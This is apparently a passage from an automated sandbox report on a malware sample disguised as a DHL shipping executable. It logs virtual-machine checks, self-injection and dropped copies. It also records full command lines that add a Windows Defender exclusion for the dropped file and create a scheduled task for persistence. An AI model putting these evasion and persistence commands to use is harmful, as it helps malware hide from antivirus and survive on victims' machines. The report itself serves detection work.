                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: B390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: C390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: D390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 2EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory allocated: 4EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 16D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 3420000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 3220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 8D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 9D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 9F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: AF10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: B4A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: C4A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: D4A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 3230000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 32B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 52B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 2570000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 25F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 45F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 84B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 94B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 96C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: A6C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: AAB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 84B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 3160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 3370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory allocated: 3160000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6644
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1829
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Window / User API: threadDelayed 2040
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Window / User API: threadDelayed 1884
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Window / User API: threadDelayed 1005
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Window / User API: threadDelayed 2382
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Window / User API: threadDelayed 354
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Window / User API: threadDelayed 2826
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Window / User API: threadDelayed 846
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Window / User API: threadDelayed 2536
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99780
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99671
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99562
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99436
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99219
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99094
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98984
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98849
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98734
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98624
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98516
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98391
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98266
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99781
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99671
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99560
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99453
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99339
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99234
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99124
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 99015
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98890
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98780
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98671
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98561
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98451
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98338
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 98208
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                      Source: DHL_1003671162.exe, 00000000.00000002.1706065904.0000000008960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: boqXv.exe, 00000014.00000002.2925216759.00000000014B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                      Source: qmUxKv.exe, 0000000B.00000002.2925539343.000000000123B000.00000004.00000020.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1895522275.0000000001599000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: DHL_1003671162.exe, 00000006.00000002.2929626503.0000000001178000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Memory written: C:\Users\user\Desktop\DHL_1003671162.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Memory written: C:\Users\user\AppData\Roaming\qmUxKv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory written: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Memory written: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Process created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe Process created: C:\Users\user\AppData\Roaming\qmUxKv.exe "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe Process created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Queries volume information: C:\Users\user\Desktop\DHL_1003671162.exe VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
